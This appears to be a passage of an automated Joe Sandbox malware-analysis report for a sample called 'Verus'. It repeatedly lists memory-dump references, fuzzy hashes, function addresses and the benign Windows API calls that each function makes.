Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: 4690a450367261dc63570c4a0ef26bf5baaba708f39071d48792a8a2fd3ab573
Instruction ID: ebe6e8fea5fd86b317903807e69cffabc9e868042a192d1603d77e097914cfe8
Opcode Fuzzy Hash: 4690a450367261dc63570c4a0ef26bf5baaba708f39071d48792a8a2fd3ab573
Instruction Fuzzy Hash: 68017C71204200AFE360AF64ED19F9B7AA8AB81725F028B5AB4959B2E0C774D840C775

Function 0044A870 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 0044A8A6
FlushInstructionCache.KERNEL32(00000000), ref: 0044A8AD
DialogBoxParamW.USER32(?,00000064,000000E9,Function_000166E0,?), ref: 0044A8DA

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 0044A8E6

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: bf233ff5f24c620080ecafa5dae2bf7b907dd431faed875c40ec9b5d07c039e9
Instruction ID: 906d332403825472914c2c27d123f5a41477020d4de595764b7c632940621870
Opcode Fuzzy Hash: bf233ff5f24c620080ecafa5dae2bf7b907dd431faed875c40ec9b5d07c039e9
Instruction Fuzzy Hash: AF017C71244300AFE324AF64ED19F5B7BA8EB85721F018B5AB5958A2E0CA74D840C776

Function 00416830 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00416866
FlushInstructionCache.KERNEL32(00000000), ref: 0041686D
DialogBoxParamW.USER32(?,000000CB,000000E9,Function_000166E0,?), ref: 0041689D

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 004168A9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: 9265c98cea69e794613d27ef2abf96f4d3c2358c23df026d4790c3ca61158344
Instruction ID: 20b81a523c93c08ffa0b5fe8cc1f51c3e4d9253cc082c9f876445b63241ecc4e
Opcode Fuzzy Hash: 9265c98cea69e794613d27ef2abf96f4d3c2358c23df026d4790c3ca61158344
Instruction Fuzzy Hash: 13018F75205300AFD360AF74ED1AF9B7BA8AF81721F068B5AB4958B2E0C774D840C775

Function 004168C0 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 004168F6
FlushInstructionCache.KERNEL32(00000000), ref: 004168FD
DialogBoxParamW.USER32(?,000000DB,000000E9,Function_000166E0,?), ref: 0041692D

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 00416939

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: 0f8fc4a4e195a6a72a3022f6b497b422b8e989cff1aae6623638d51f3a1c2452
Instruction ID: 6df5747df31218d555a2fea73e7e255ad6c78bde1eacb716ee389b59712e4343
Opcode Fuzzy Hash: 0f8fc4a4e195a6a72a3022f6b497b422b8e989cff1aae6623638d51f3a1c2452
Instruction Fuzzy Hash: B4018F71204300AFD320AF78ED19F9B7BA8AF81721F028B5AB4959B2E0CB74D840C775

Function 00416950 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00416986
FlushInstructionCache.KERNEL32(00000000), ref: 0041698D
CreateDialogParamW.USER32(?,000000C9,000000E9,Function_000166E0,?), ref: 004169BD

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 004169C9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCreateCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 3830230333-0
Opcode ID: cb72fae3df5c35d44d284c5adca9732111f675f10a015d69c90db4117e6b5f35
Instruction ID: e836aa77cc7c819fb62f1146a0d2bd5b23c98252fd39fe95ac42af15222b3e8b
Opcode Fuzzy Hash: cb72fae3df5c35d44d284c5adca9732111f675f10a015d69c90db4117e6b5f35
Instruction Fuzzy Hash: 4901A275204300AFD320AF74ED19F5B7BA8EF85711F028A5EB4859B2E0C674D840C775

Function 0044A900 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 0044A936
FlushInstructionCache.KERNEL32(00000000), ref: 0044A93D
DialogBoxParamW.USER32(?,000000CE,000000E9,Function_000166E0,?), ref: 0044A96D

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 0044A979

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: c2b26f57b47253dce0f8c4d6e6c3f5552ccae6de6dd233f01bcc575539a5b4cc
Instruction ID: b6f57effebd3dce065ee6cecead8dfd5832b50dee07f6890618e7d488f608cdf
Opcode Fuzzy Hash: c2b26f57b47253dce0f8c4d6e6c3f5552ccae6de6dd233f01bcc575539a5b4cc
Instruction Fuzzy Hash: F9018F75244300AFE360AF74ED19F5B7BA8AF85721F028B5AB4958B2E0C774D840C775

Function 004169E0 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00416A16
FlushInstructionCache.KERNEL32(00000000), ref: 00416A1D
CreateDialogParamW.USER32(?,000000CA,000000E9,Function_000166E0,?), ref: 00416A4D

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 00416A59

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCreateCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 3830230333-0
Opcode ID: f11f1133f8bfb754b486a29b2c2d7b7ae97dcba15e677e7b554da313622572e5
Instruction ID: f623c8432d7ef8acd7b9314a5d40d5dd7db8c812b778dd1828a91934e6b01ca0
Opcode Fuzzy Hash: f11f1133f8bfb754b486a29b2c2d7b7ae97dcba15e677e7b554da313622572e5
Instruction Fuzzy Hash: 6C01A271204300AFD320AF74ED19F5B7BA8EF95715F028A6EB4459B2E0C674D840C775

Function 0044A990 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 0044A9C6
FlushInstructionCache.KERNEL32(00000000), ref: 0044A9CD
DialogBoxParamW.USER32(?,000000E9,000000E9,Function_000166E0,?), ref: 0044A9FD

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 0044AA09

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: 0d8236454a0c6a1b9ef02b20b3ec1ec8243d615546db69aa32f37420bd8aa5f6
Instruction ID: 09b91af99e2f70a33bfccbf5e4cbbadf3c3f38db9337673651b30446a0f6501e
Opcode Fuzzy Hash: 0d8236454a0c6a1b9ef02b20b3ec1ec8243d615546db69aa32f37420bd8aa5f6
Instruction Fuzzy Hash: 8101DF71204300AFE320AF74ED09F5B7BA8AF81721F028B5AB4959B2E0C774D840C776

Function 0046CE40 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 0046CE76
FlushInstructionCache.KERNEL32(00000000), ref: 0046CE7D
DialogBoxParamW.USER32(?,000000EF,000000E9,Function_000166E0,?), ref: 0046CEAD

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 0046CEB9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: 8b328cd68a9b07b4b81ed82e5f8f8278eaaf8ae2f9acc58126f966fedac26ed8
Instruction ID: 859b2110a62feac80f21d1fc0e25951ded65f89986a8be60495536a0825cdeb1
Opcode Fuzzy Hash: 8b328cd68a9b07b4b81ed82e5f8f8278eaaf8ae2f9acc58126f966fedac26ed8
Instruction Fuzzy Hash: FD018F71204300AFD320AF74ED19F6B7BA8AF91721F018B5AB4959B2E0C774D840C776

Function 00436E50 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00436E86
FlushInstructionCache.KERNEL32(00000000), ref: 00436E8D
DialogBoxParamW.USER32(?,000000F5,000000E9,Function_000166E0,?), ref: 00436EBD

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 00436EC9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: 6a21ca98856df36a7e65307450dcfe7a610292e10071a461766409282d246902
Instruction ID: c4fe0e82dfbc4f0f11fcd2c862573f1e45333ec235ad6bbd2eb49230862eacfa
Opcode Fuzzy Hash: 6a21ca98856df36a7e65307450dcfe7a610292e10071a461766409282d246902
Instruction Fuzzy Hash: CF018F75204301AFD320AF74ED1AF5B7BA8AF85722F028B5AB5958B2E0CB74D844C775

Function 0045EE60 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 0045EE96
FlushInstructionCache.KERNEL32(00000000), ref: 0045EE9D
DialogBoxParamW.USER32(?,000000F3,000000E9,Function_000166E0,?), ref: 0045EECD

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 0045EED9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: 7f72bbac39ccfb3a2088adf0c16536092a7469149a40dfc7b7d2a6e5cd98fef5
Instruction ID: c4a5a23bcd76f6097d2993429acded5bc5ae1d81bc37566a5997e5604cb3cd57
Opcode Fuzzy Hash: 7f72bbac39ccfb3a2088adf0c16536092a7469149a40dfc7b7d2a6e5cd98fef5
Instruction Fuzzy Hash: 6001BC31200200AFD324AF64ED1AF5B7AA8AB81722F018B6AB4958A2E0CB74D844C775

Function 00422F30 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00422F66
FlushInstructionCache.KERNEL32(00000000), ref: 00422F6D
DialogBoxParamW.USER32(?,000000F8,000000E9,Function_000166E0,?), ref: 00422F9D

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 00422FA9

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 2519808469-0
Opcode ID: 806120bf9808741fd8a8c092dac104b94750d542b37e8ec8129dc1e8912e14d1
Instruction ID: b594da060fd47f2fb9ba51af3114244d12574af1f8ea907d40b1ff6ef11699e8
Opcode Fuzzy Hash: 806120bf9808741fd8a8c092dac104b94750d542b37e8ec8129dc1e8912e14d1
Instruction Fuzzy Hash: EE01D431200300AFD360AF74ED19F9B7BA8AF95721F02875AB4558B2E0CB74D840C775

Function 00440FB0 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,0000000D), ref: 00440FE6
FlushInstructionCache.KERNEL32(00000000), ref: 00440FED
CreateDialogParamW.USER32(?,000000CD,000000E9,Function_000166E0,?), ref: 0044101D

Part of subcall function 00490CEC: GetProcessHeap.KERNEL32(00000000,0000000D,?,00415D3E), ref: 00490C6D
Part of subcall function 00490CEC: HeapAlloc.KERNEL32(00000000,?,00415D3E), ref: 00490C74

SetLastError.KERNEL32(0000000E), ref: 00441029

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: HeapProcess$AllocCacheCreateCurrentDialogErrorFlushInstructionLastParam
String ID:
API String ID: 3830230333-0
Opcode ID: 7b045b3c8a610f868a1e1d1582c322b627ca76adc3ebffc72293dc05d9fedb0d
Instruction ID: 62fa687a276b12b1db1204fd9014f39b376364953413200c5507e4cd2c7b165c
Opcode Fuzzy Hash: 7b045b3c8a610f868a1e1d1582c322b627ca76adc3ebffc72293dc05d9fedb0d
Instruction Fuzzy Hash: 3D01AD71205300AFE320AFB4ED19F5B7BA8EF95711F028A6EB5858B2E0C674D840C775

Function 0043AA80 Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0043AA8C

Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 00415452
Part of subcall function 00415440: GetParent.USER32 ref: 00415473
Part of subcall function 00415440: GetWindowRect.USER32(?,?), ref: 0041548C
Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 004154A1
Part of subcall function 00415440: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004154C2

SetWindowTextW.USER32(?,?), ref: 0043AAA2
SetDlgItemTextW.USER32(-00000008,0000044C,-00000008), ref: 0043AAC2
SetDlgItemTextW.USER32(?,00000448,-00000148), ref: 0043AADA

Memory Dump Source

